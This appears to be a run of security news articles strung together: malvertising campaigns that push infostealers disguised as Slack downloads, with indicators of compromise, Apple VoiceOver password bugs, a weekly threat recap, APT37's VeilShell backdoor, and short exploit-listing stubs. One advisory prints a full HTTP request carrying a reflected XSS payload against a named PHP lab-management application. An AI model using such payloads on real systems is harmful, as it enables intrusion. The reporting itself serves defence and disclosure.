Malicious Google sponsored results disguised as software downloads lead to malware.

After what seemed like a long hiatus, we’ve observed threat actors returning to malvertising to drop malware disguised as software downloads. The campaign we identified is high-impact, going after utility software such as Slack, Notion, Calendly, Odoo, Basecamp, and others. For this blog, we decided to focus on the Mac version of communication tool Slack.

Following the creation of advertiser identities belonging to real businesses, the threat actors launch their malicious ads, hiding their infrastructure behind several layers of fingerprinting and cloaking.

We have reported these incidents to Google and the related advertisers have been banned. However, we are still finding new malicious ads and hearing from others seeing the same, indicating that this campaign is not over yet.

**Wanted: Utility software**

The threat actor is abusing various platforms to host their payloads, giving insights into what they are choosing to lure in victims. For Windows users, all payloads were found in various GitHub accounts which we have reported already.

For Mac, we saw payloads originating from the same domain via PHP scripts using identifiers. These appear to be created for individual and perhaps time-based downloads. Other links that include the name of the software (i.e. _clockify\_mac.php_) work regardless.

creativekt\[.\]com/macdownloads/script\_6703ea1fc058e8.92130856.php  
creativekt\[.\]com/macdownloads/script\_66ffc3cf465a45.36592714.php  
creativekt\[.\]com/macdownloads/clockify\_mac.php  
creativekt\[.\]com/macdownloads/script\_66e6ba358cd842.42527539.php

**Impersonating two identities at once**

When we searched for Slack from the US, the top Google result was an ad that looked completely trustworthy. It had the brand’s logo, official website and even detailed description.

If you follow this blog, you probably know there is more to it. By clicking on the three dots next to the ad, you can see more information about the advertiser, which in this case is a law firm.

_Note: We understand that most users will not—for lack of time, interest or knowledge—take this step, which is why we offer solutions such as Malwarebytes Browser Guard that automatically blocks ads._

The “My Ad Center” vignette shows that the advertiser was not verified yet, but we were able to access their profile and see their collection of ads. There were four ads in total, and three of them were related to lawyer services using the name and address of a real company in the US.

The Slack ad was somewhat the odd one sticking out but could, in theory, have been promoted by this advertiser. What we believe is the problem with Google ads is how any advertiser can still use the branding of a major company as if they were them. From the point of view of internet users, this is extremely deceiving and provides no rail guard against abuse.

After we validated the ad ourselves and saw where it redirected to (a malicious site), we reported it to Google. Very shortly thereafter, Google took action and removed not just the ad, but the advertiser.

However, a couple of days later a new ad appeared, once again using a stolen identity this time from a women’s health company.

**Decoy site and payload**

As we have seen before, the malicious ad starts a redirection chain made of various click trackers, cloaking and a decoy site. This allows victim profiling, but more importantly it is used to avoid automated detection in order to keep the ad up and running as long as possible.

Victims eventually land on a decoy sites, similar to those used for phishing credentials, except here the end goal is to trick users into downloading malware.

Windows users get their respective payload hosted on GitHub. The binaries have been inflated into large files to hinder sandbox analysis and are likely Rhadamathys infostealer.

For Apple users, the installers are also an infostealer, branched out of the AMOS (Atomic Stealer) family. Passwords and other secrets found on a system within the file system, browsers, extensions and apps are grabbed and uploaded as a zip archive onto a remote server located in Russia:

**Conclusion**

When we investigate ads, we use a simple yet realistic setup that mimics what most users would have. This is not an automated process, which sometimes requires multiple attempts from different geographic locations and browser profiles. While this work can be tedious and time consuming, we believe it is necessary in order to identify threat actors at the source, therefore providing protection to the Malwarebytes customer base, but also anyone else that uses the Google search engine.

Slack is not the only brand that threat actors like to impersonate. In fact, we also saw and reported malicious ads for the productivity suite Notion. We noticed that it also shared the same payload hosting infrastructure, indicating that the two campaigns were related.

If you are still clicking on ads to download software, you take a risk by allowing fraudulent advertisers to redirect you to malicious sites. Inadvertently installing malware and getting your identity stolen has never been easier.

We recommend paying special attention to sponsored results or adopting a tool such as Malwarebytes Browser Guard. For our Mac users, we detect this threat as OSX.Poseidon.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**Indicators of Compromise**

Malicious domains

creativekt\[.\]com  
slack\[.\]designexplorerapp\[.\]net  
odoo\[.\]studioplatformapp\[.\]net  
notion\[.\]foreducationapp\[.\]com  
slack\[.\]workmeetingsapp\[.\]com

Payloads (Windows)

9c8dadbb45f63fb07fd0a6b6c36c7aa37621bbadc1bcc41823c5aad1b0d3e93e  
2b587ca6eb1af162951ade0e214b856f558cc859ae1a8674646f853661704211  
e3557fb78e8fca926cdb16db081960efc78945435b2233fbd80675c21f0bc2e2  
637b3ac5b315fd77b582dff2b55a65605f2782a717bed5aa6ef3c9722e926955  
79017a6a96b19989bcf06d3ceaa42fd124a0a3d7c7fca64af9478e08e6c67c72  
6eb1e3abf8a94951a661513bee49ffdbecfc8f7f225de83fa9417073814d4601  
de7b5e6c7b3cee30b31a05cc4025d0e40a14d5927d8c6c84b6d0853aea097733  
77615ea76aedf283b0e69a0d5830035330692523b505c199e0b408bcccd147b7

Payloads (Mac)

b55f2cb39914d84a4aa5de2f770f1eac3151ca19615b99bda5a4e1f8418221c2  
9dc9c06c73d1a69d746662698ac8d8f4669cde4b3af73562cf145e6c23f0ebdd

Command and control servers

85.209.11\[.\]155  
193.3.19\[.\]251

 Large scale Google Ads campaign targets utility software 

This is a thorough write up of how to exploit a local privilege escalation vulnerability in iTunes for Windows version 12.13.2.3. Apple fixed this in version 12.13.3.

iTunes For Windows 12.13.2.3 Local Privilege Escalation

Apple has fixed a security issue in iOS (and iPadOS) that could have leaked a user's passwords through the VoiceOver feature.

Apple has issued security updates for iOS 18.0.1 and iPadOS 18.0.1 which includes a fix for a bug that could allow a user’s saved passwords to be read aloud by its VoiceOver feature.

VoiceOver allows users to use their iPhone or iPad even if they can’t see the screen. It gives audible descriptions of what’s on your screen—for example, the battery level, who’s calling you, or what item your finger is on.

Unfortunately, that also included an audible description of a user’s saved passwords, effectively reading aloud someone’s passwords.

While the chance of abusing this vulnerability is relatively small—the device would have to be unlocked and in the attacker’s proximity to exploit it—it’s always better to install security updates as soon as possible. Once criminals know vulnerabilities exist they tend to go looking for unpatched vulnerable devices.

The patch for the flaw (listed as CVE-2024-44207) is available for iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.

To check if you’re using the latest software version of iOS and iPadOS, go to **Settings** > **General** > **Software Update**. You want to be on iOS 18.0.1 or iPadOS 18.0.1.

If you’re not on the latest version, you can update from this screen. It’s also worth turning on Automatic Updates if you haven’t already, which you can also do from this screen.

Preferred setting for automatic updates

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 iPhone flaw could read your saved passwords out loud. Update now! 

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.
Get the scoop before it's too late!
⚡ Threat of the Week
Double Trouble: Evil Corp & LockBit Fall: A consortium of international law enforcement agencies took steps to arrest four

Cybersecurity / Weekly Recap

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.

Get the scoop before it's too late!

****⚡ Threat of the Week****

**Double Trouble: Evil Corp & LockBit Fall:** A consortium of international law enforcement agencies took steps to arrest four people and take down nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation. In tandem, authorities outed a Russian national named Aleksandr Ryzhenkov, who was one of the high-ranking members of the Evil Corp cybercrime group and also a LockBit affiliate. A total of 16 individuals who were part of Evil Corp have been sanctioned by the U.K.

  
****🔔 Top News****

*   **DoJ & Microsoft Seize 100+ Russian Hacker Domains:** The U.S. Department of Justice (DoJ) and Microsoft announced the seizure of 107 internet domains used by a Russian state-sponsored threat actor called COLDRIVER to orchestrate credential harvesting campaigns targeting NGOs and think tanks that support government employees and military and intelligence officials.
*   **Record-Breaking 3.8 Tbps DDoS Attack:** Cloudflare revealed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at 3.8 terabits per second (Tbps) and lasted 65 seconds. The attack is part of a broader wave of over a hundred hyper-volumetric L3/4 DDoS attacks that have been ongoing since early September 2024 targeting financial services, Internet, and telecommunication industries. The activity has not been attributed to any specific threat actor.
*   **North Korean Hackers Deploy New VeilShell Trojan:** A North Korea-linked threat actor called APT37 has been attributed as behind a stealthy campaign targeting Cambodia and likely other Southeast Asian countries that deliver a previously undocumented backdoor and remote access trojan (RAT) called VeilShell. The malware is suspected to be distributed via spear-phishing emails.
*   **Fake Trading Apps on Apple and Google Stores:** A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims as part of what's called a pig butchering scam. The apps are no longer available for download. The campaign has been found to target users across Asia-Pacific, Europe, Middle East, and Africa. In a related development, Gizmodo reported that Truth Social users have lost hundreds of thousands of dollars to pig butchering scams.
*   **700,000+ DrayTek Routers Vulnerable to Remote Attacks:** As many as 14 security flaws, dubbed DRAY:BREAK, have been uncovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices. The vulnerabilities have been patched following responsible disclosure.

****📰 Around the Cyber World****

*   **Salt Typhoon Breached AT&T, Verizon, and Lumen Networks:** A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. "The hackers appear to have engaged in a vast collection of internet traffic from internet service providers that count businesses large and small, and millions of Americans, as their customers."
*   **U.K. and U.S. Warn of Iranian Spear-Phishing Activity:** Cyber actors working on behalf of the Iranian Government's Islamic Revolutionary Guard Corps (IRGC) have targeted individuals with a nexus to Iranian and Middle Eastern affairs to gain unauthorized access to their personal and business accounts using social engineering techniques, either via email or messaging platforms. "The actors often attempt to build rapport before soliciting victims to access a document via a hyperlink, which redirects victims to a false email account login page for the purpose of capturing credentials," the agencies said in an advisory. "Victims may be prompted to input two-factor authentication codes, provide them via a messaging application, or interact with phone notifications to permit access to the cyber actors."
*   **NIST NVD Backlog Crisis - 18,000+ CVEs Unanalyzed:** A new analysis has revealed that the National Institute of Standards and Technology (NIST), the U.S. government standards body, has still a long way to go in terms of analyzing newly published CVEs. As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)." It's worth noting that a total of 25,357 new vulnerabilities have been added to NVD since February 12, 2024, when NIST scaled back its processing and enrichment of new vulnerabilities.
*   **Major RPKI Flaws Uncovered in BGP's Cryptographic Defense:** A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges." These vulnerabilities range from denial-of-service and authentication bypass to cache poisoning and remote code execution.
*   **Telegram's Data Policy Shift Pushes Cybercriminals to Alternative Apps:** Telegram's recent decision to give users' IP addresses and phone numbers to authorities in response to valid legal requests is prompting cybercrime groups to seek other alternatives to the messaging app, including Jabber, Tox, Matrix, Signal, and Session. The Bl00dy ransomware gang has declared that it's "quitting Telegram," while hacktivist groups like Al Ahad, Moroccan Cyber Aliens, and RipperSec have expressed an intent to move to Signal and Discord. That said, neither Signal nor Session support bot functionality or APIs like Telegram nor do they have extensive group messaging capabilities. Jabber and Tox, on the other hand, have already been used by adversaries operating on underground forums. "Telegram's expansive global user base still provides extensive reach, which is crucial for cybercriminal activities such as disseminating information, recruiting associates or selling illicit goods and services," Intel 471 said. Telegram CEO Pavel Durov, however, has downplayed the changes, stating "little has changed" and that it has been sharing data with law enforcement since 2018 in response to valid legal requests. "For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3," Durov added.

**🔥 **Cybersecurity Resources & Insights****

*   **LIVE Webinars**
    *   **Modernization of Authentication: Passwords vs Passwordless and MFA:** Are you sure your passwords are enough? Discover the truth about passwordless tech and how MFA can protect you in ways you didn't even know you needed. Join our webinar to get ahead of the next big shift in cybersecurity.
*   **Ask the Expert**
    *   **Q: How can organizations reduce compliance costs while strengthening their security measures?**
    *   **A:** You can reduce compliance costs while strengthening security by smartly integrating modern tech and frameworks. Start by adopting unified security models like NIST CSF or ISO 27001 to cover multiple compliance needs, making audits easier. Focus on high-risk areas using methods like FAIR so your efforts tackle the most critical threats. Automate compliance checks with tools like Splunk or IBM QRadar, and use AI for faster threat detection. Consolidate your security tools into platforms like Microsoft 365 Defender to save on licenses and simplify management. Using cloud services with built-in compliance from providers like AWS or Azure can also cut infrastructure costs. Boost your team's security awareness with interactive training platforms to build a culture that avoids mistakes. Automate compliance reporting using ServiceNow GRC to make documentation easy. Implement Zero Trust strategies like micro-segmentation and continuous identity verification to strengthen defenses. Keep an eye on your systems with tools like Tenable.io to find and fix vulnerabilities early. By following these steps, you can save on compliance expenses while keeping your security strong.
*   **Cybersecurity Tools**
    *   **capa Explorer Web** is a browser-based tool that lets you interactively explore program capabilities identified by capa. It provides an easy way to analyze and visualize capa's results in your web browser. capa is a free, open-source tool by the FLARE team that extracts capabilities from executable files, helping you triage unknown files, guide reverse engineering, and hunt for malware.
    *   **Ransomware Tool Matrix** is an up-to-date list of tools used by ransomware and extortion gangs. Since these cybercriminals often reuse tools, we can use this info to hunt for threats, improve incident responses, spot patterns in their behavior, and simulate their tactics in security drills.

****🔒 Tip of the Week****

**Keep an "Ingredients List" for Your Software:** Your software is like a recipe made from various ingredients—third-party components and open-source libraries. By creating a **Software Bill of Materials (SBOM)**, a detailed list of these components, you can quickly find and fix security issues when they arise. Regularly update this list, integrate it into your development process, watch for new vulnerabilities, and educate your team about these parts. This reduces hidden risks, speeds up problem-solving, meets regulations, and builds trust through transparency.

****Conclusion****

Wow, this week really showed us that cyber threats can pop up where we least expect them—even in apps and networks we trust. The big lesson? Stay alert and always question what's in front of you. Keep learning, stay curious, and let's outsmart the bad guys together. Until next time, stay safe out there!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats and Trends (Sep 30 - Oct 6)

Plus: Harvard students pack Meta’s smart glasses with privacy-invading face-recognition tech, Microsoft and the DOJ seize Russian hackers’ domains, and more.

Pig butchering, the crypto-based scammer scourge that has pulled in an estimated $75 billion from victims globally, is spreading beyond its roots in Southeast Asia, with operations proliferating across the Middle East, Eastern Europe, Latin America, and West Africa.

The UK's National Crime Agency disclosed new details about the identities of the Russian ransomware group known as Evil Corp—as well as the group's ties to Russian intelligence agencies and even its direct participation in espionage operations targeting NATO allies.

A WIRED investigation revealed how car-mounted automatic license plate reader cameras are capturing far more than just license plates, including campaign yard signs, bumper stickers, and other politically sensitive text, all examples of how a system for tracking vehicles threatens to become a broader surveillance tool.

In other news, ICE signed a $2 million contract with Paragon Solutions, a known vendor of spyware including the hacking tool Graphite. And the Pentagon is increasingly adopting handheld controllers for weapons systems in an effort provide more intuitive interfaces to soldiers who have grown up playing Xbox and PlayStation consoles.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

As the politics of America's biggest city have been turned upside down by the criminal charges against New York mayor Eric Adams, there's still a “significant wild card” in the corruption case against him, prosecutors said in court this week: The FBI can't manage to get into his phone.

Prosecutors in the case against Adams, which centers on alleged illegal payments the mayor received from the Turkish government, revealed that the FBI still hasn't cracked the encryption on Adams' personal phone, nearly a year after it was seized. That phone is one of three that the bureau has taken from Adams, but agents seized Adams' personal phone a day later than the other two devices he used in an official capacity. By that time, Adams had not only changed the passcode on the phone from a four digit PIN to six digits—a measure he says he took to prevent staffers from intentionally or unintentionally deleting information from the device. He also claims he immediately “forgot” that code to unlock it.

That very convenient amnesia may leave the FBI and prosecutors in a situation similar to their investigation into the San Bernardino mass shooting carried out by Syed Rizwan Farook in 2016, when the US government demanded Apple help unlock the shooter's encrypted iPhone, leading to a high-profile standoff between the Apple and the FBI. In that case, the cybersecurity firm Azimuth eventually used a closely guarded—and expensive—hacking technique to unlock the device. In Adams' case, prosecutors hinted that the FBI may have to resort to similar measures. “Decryption always catches up with encryption,” a prosecutor in the case, Hagan Scotten, told the judge.

Face recognition is one of only a few technologies that even Facebook and Google have hesitated to integrate into products like Google Glass and the Ray-Ban Meta smart glasses—and rightly so, given the privacy implications of a device that would allow anyone to look at a stranger on the street and immediately determine their phone number and home address. Now, however, a group of Harvard students has shown how easy it is to bolt that face recognition onto Meta's augmented-reality eyewear. The project, known as I-XRAY, integrates with the face-recognition service Pimeyes to let Ray-Ban Meta wearers learn the name of virtually anyone they see and then immediately scour databases of personal information to determine other info about them, including names of family members, phone numbers, and home addresses. The students say they're not releasing the code for their experiment, instead intending it as a demonstration of the privacy-invasive potential of augmented-reality devices. Point made.

If that warning about the privacy risks of AR eyewear needed more reinforcement, Meta this week also conceded to TechCrunch that it will use input from users' smart glasses to train its AI products. Initially, Meta declined to answer TechCrunch's questions about whether and how it would collect information from Ray-Ban Meta smart glasses for use as AI training data, in contrast to companies like OpenAI and Anthropic that explicitly say they don't exploit user inputs to train their AI services. A couple of days later, however, Meta confirmed to TechCrunch that it does in fact use images or video collected through its smart glasses to train its AI, but only if the user submits them to Meta's AI tools. That means anything that a user sees and asks Meta's AI chatbot to comment on or analyze will become part of Meta's massive AI-training data trove.

If you can't arrest Russian hackers, at least you can nab their web domains. That, at least, is the approach this week of the US Justice Department, which along with Microsoft and the NGO Information Sharing and Analysis Center used a lawsuit to take control of more than a hundred web domains that had been used by Russian hackers working for the Kremlin's intelligence and law enforcement agency known as the FSB. Those domains had been exploited in phishing campaigns by the Russian hacker group known as Star Blizzard, which has a history of targeting the typical victims of geopolitical spying such as journalists, think tanks, and NGOs. The domain seizures seem designed in part to head off threats of foreign interference in next month's US election. “Rebuilding infrastructure takes time, absorbs resources, and costs money,” Steven Masada, the assistant general counsel of Microsoft’s Digital Crimes Unit, said in a statement. “Today’s action impacts \[the hackers'\] operations at a critical point in time when foreign interference in US democratic processes is of utmost concern.”

The FBI Still Hasn’t Cracked NYC Mayor Eric Adams’ Phone

Apple has released iOS and iPadOS updates to address two security issues, one of which could have allowed a user's passwords to be read out aloud by its VoiceOver assistive technology.
The vulnerability, tracked as CVE-2024-44204, has been described as a logic problem in the new Passwords app impacting a slew of iPhones and iPads. Security researcher Bistrit Daha has been credited with

Data Privacy / Mobile Security

Apple has released iOS and iPadOS updates to address two security issues, one of which could have allowed a user's passwords to be read out aloud by its VoiceOver assistive technology.

The vulnerability, tracked as CVE-2024-44204, has been described as a logic problem in the new Passwords app impacting a slew of iPhones and iPads. Security researcher Bistrit Daha has been credited with discovering and reporting the flaw.

"A user's saved passwords may be read aloud by VoiceOver," Apple said in an advisory released this week, adding it was resolved with improved validation.

The shortcoming impacts the following devices -

*   iPhone XS and later
*   iPad Pro 13-inch
*   iPad Pro 12.9-inch 3rd generation and later
*   iPad Pro 11-inch 1st generation and later
*   iPad Air 3rd generation and later
*   iPad 7th generation and later, and
*   iPad mini 5th generation and later

Also patched by Apple is a security vulnerability (CVE-2024-44207) specific to the newly launched iPhone 16 models that allows audio to be captured before the microphone indicator is on. It's rooted in the Media Session component.

"Audio messages in Messages may be able to capture a few seconds of audio before the microphone indicator is activated," the iPhone maker noted.

The problem has been fixed with improved checks, it added, crediting Michael Jimenez and an anonymous researcher for reporting it.

Users are advised to update to iOS 18.0.1 and iPadOS 18.0.1 to safeguard their devices against potential risks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases Critical iOS and iPadOS Updates to Fix VoiceOver Password Vulnerability

CVE-2024-44204 is one of two new Apple iOS security vulnerabilities that showcase an unexpected coming together of privacy snafus and accessibility features.

Source: Aleksey Boldin via Alamy Stock Photo

Apple has patched two quirky bugs that might have offended privacy-oriented iPhone and iPad owners.

The first — an issue with Apple's VoiceOver accessibility feature — could have caused iPhones or iPads to announce sensitive passwords out loud. The other issue — affecting voice messages on new iPhone models — could have recorded users for brief seconds before they knew they were being recorded.

New operating system versions are available for both iOS and iPadOS (18.0.1), fixing each bug with improved validation and checks, respectively. Users should update their devices to avoid being vulnerable.

As Michael Covington, vice president of portfolio strategy for Jamf points out, "The good news is that neither of these highlighted issues involve remote exploits. They are, in fact, issues that will arise with use of the device, and it's user privacy that is ultimately at risk."

Still, he says that "for businesses that use mobile in any capacity for work, I recommend they pay close attention to both of the security issues and take appropriate action to update devices as soon as possible."

**Bug #1: Reading Passwords Aloud**

The first issue involves VoiceOver, the accessibility feature that provides visually impaired users with audible descriptions of the various elements on their screens — text, buttons, images, etc. VoiceOver also allows users to navigate their devices using voice commands and gestures.

Perhaps not everything on a device should be read aloud, though, like passwords. Last month, as part of iOS and iPadOS 18, Apple released a brand new app, "Passwords," allowing users to easily store and manage logins on their devices. CVE-2024-44204 is a logic issue that could have allowed VoiceOver to read out such a user's passwords. It affected essentially every model of iPhone and iPad released since 2018.

VoiceOver is off by default, meaning that only select iPhone users were potentially affected.

Covington notes, "This is not the first time we've seen accessibility features misused. Previous instances include screen reader technology being used by misbehaving apps to capture on-screen details and exfiltrate data from the device. Fortunately, most accessibility features go through extensive security and privacy testing, so these scenarios do not tend to arise often."

**Bug #2: Beginning Audio Messages Too Early**

If iPhone users are on the go, have a lot to say, or maybe just have tired thumbs, they might choose to record an audio message in iMessage, instead of a regular text. After they hit that plus sign on the left side of the message box and choose "Audio," the device will indicate that it has started recording with a red-highlighted sound wave in place of the message box, and a little orange dot in the pill-sized Dynamic Island at the top of the screen.

A security researcher recently discovered though that audio messages could have captured a few seconds of audio before users were made aware that their microphone was hot. The issue has been labeled CVE-2024-44207, and affects all models of the new iPhone 16.

Though it might seem — and, in most cases, would be — a relatively minor issue, Covington points out, "this disconnect between device function and the associated visual indicators is something that Jamf’s own threat research team has connected to persistence techniques used by attackers to maintain a presence on the device following a successful exploit. Addressing this bug before it can be misused is a big win for Apple."

Neither the VoiceOver nor the audio message vulnerability has received a rating in the Common Vulnerability Scoring System (CVSS) yet, nor are any further details public at this time.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

iPhone 'VoiceOver' Feature Could Read Passwords Aloud

Computer Laboratory Management System 2024 version 1.0 suffers from a cross site scripting vulnerability.

    ## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure## Author: nu11secur1ty## Date: 00/04/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the username request parameter is copied into the HTMLdocument as plain text between tags. The payload ro2iz<img src=aonerror=alert(1)>xggkt was submitted in the username parameter. This inputwas echoed unmodified in the application's response.STATUS: HIGH- Vulnerability[+]Exploits:- XSS-Reflected:```xssPOST /php-lms/classes/Login.php?f=login HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqmlOrigin: https://pwnedhost.comX-Requested-With: XMLHttpRequestReferer: https://pwnedhost.com/php-lms/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128","Chromium";v="128"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7```+ [Response]```HTTP/1.1 200 OKDate: Fri, 04 Oct 2024 08:27:39 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 177Connection: closeContent-Type: text/html; charset=UTF-8{"status":"incorrect","last_qry":"SELECT * from users where username ='VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}```## Reproduce:[href](https://www.patreon.com/nu11secur1ty)## Demo PoC:[href](https://www.patreon.com/nu11secur1ty)## Time spent:00:27:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Computer Laboratory Management System 2024 1.0 Cross Site Scripting

It's North Korea versus Cambodia, with Windows default settings and sheer patience allowing the bad guys to avoid easy detection.

Source: motioncenter via Alamy Stock Photo

The North Korean state-sponsored threat actor known as APT37 has been carefully spreading a novel backdoor, dubbed "VeilShell." Of note is its target: Most North Korean advanced persistent threats (APTs) have a history of targeting organizations in South Korea or Japan, but APT37's latest campaign seems to be directed at a nation Kim Jong-Un has more complex relations with: Cambodia.

While Pyongyang still maintains an embassy in Phnom Penh and the two nations share a history of Soviet ties in the region, the modern-day relationship between the two is far from cozy. The DPRK's nuclear weapons program, ongoing missile tests, cyber activities, and general aggression towards its neighbors contradicts Cambodia's stance on weapons of mass destruction (WMDs) and its call for meaningful diplomatic dialogue between all countries in the region, observers in the region have noted.

That wariness has drawn the attention of the North Korean regime, according to Securonix, which has flagged a new campaign called "Shrouded#Sleep" circulating against Cambodian organizations.

Securonix did not share detailed victimology, but to lure in targets, APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, ScarCruft, and Ricochet Chollima) has been spreading malicious emails relating to Cambodian affairs, and in Cambodia's primary language, Khmer. One lure for instance offers recipients access to a spreadsheet related to annual income in US dollars across various sectors in the country, such as social work, education, health, and agriculture.

Related:China-Backed APT Group Culling Thai Government Data

Hidden in these emails are maliciously crafted shortcut files concealing the backdoor, used to establish quiet persistence in targeted networks.

**Shrouded#Sleep's Stealthy Shortcuts**

In terms of the infection routine, a Shrouded#Sleep infection begins, like many others do, with a .ZIP archive containing a Windows shortcut (.LNK) file.

"It's incredibly common — if you were to throw a dart at the threat actor dartboard, a shortcut file is probably going to be hit," says Tim Peck, senior threat researcher at Securonix. "It's easy, it's effective. It pairs really well with phishing emails. And it's easy to mask."

Windows hides the .LNK file extension by default, substituting it with a little arrow in the bottom left hand corner of a file's icon, making for an overall cleaner user interface. The upshot is that attackers like APT37 can swap a .LNK's default icon with another of their choosing, and use double extensions to hide the true nature of the file.

APT37 gives its shortcut files PDF and Excel icons, and assigned them double extensions like ".pdf.lnk," or ".xls.lnk," so that only the .PDF and .XLS parts of the extension show up for users.

Related:UAE, Saudi Arabia Become Plum Cyberattack Targets

In the end, Peck notes, "Unless you're looking for the little arrow that Microsoft adds on shortcut files, odds are you might miss that." An unreasonably eagle-eyed victim might also have noticed that unlike typical shortcut files — which tend to be just a few kilobytes in size — these were anywhere from 60 to 600 kilobytes.

Contained within those kilobytes was APT37's malicious payload, which Securonix has named "VeilShell." 

**VeilShell's Patient Persistence**

The SHROUDED#SLEEP campaign is notable for its state-of-the-art blend of living-off-the-land and proprietary tools, plus impressive persistence and stealth mechanism.

"It represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems," according to the Securonix analysis. "Throughout this investigation, we have shown how the threat actors methodically crafted their payloads and made use of an interesting combination of legitimate tools and techniques to bypass defenses and maintain access to their targets."

Related:China's 'Earth Baxia' Spies Exploit Geoserver to Target APAC Orgs

VeilShell for instance is a multifunctional, PowerShell-based backdoor-plus-remote-access-trojan (RAT). It's capable of all the things RATs tend to do: download and upload files, modify and delete existing files on the system, modify system settings, create scheduled tasks for persistence, etc.

Notably, APT37 also achieves persistence via AppDomainManager injection, a rarer technique involving the injection of malicious code into .NET applications.

All of these malicious functions and techniques might otherwise make a lot of noise on targeted systems, so APT37 uses some tricks to provide counterbalance. For example, it implements long sleep timers to break up different stages of the attack chain, ensuring that malicious activities don't occur in obvious succession.

As Peck tells it, "The threat actors were incredibly patient, slow, and methodical. They used a lot of long sleep timers — we're talking, like, 6,000 seconds in between different attack stages. And the main goal \[of the shortcut file\] was to set the stage. It didn't actually execute any malware. It dropped the files into a location that would allow them to execute on their own on the next system reboot. That reboot could be the same day, or a week from now, depending on how the user uses their PC."

It was emblematic, perhaps, of a threat actor with confidence and patience to spare. "A lot of times we see these dive in, dive out types of campaigns. But this was definitely designed with stealth in mind," he says.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

DPRK's APT37 Targets Cambodia With Khmer, 'VeilShell' Backdoor

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

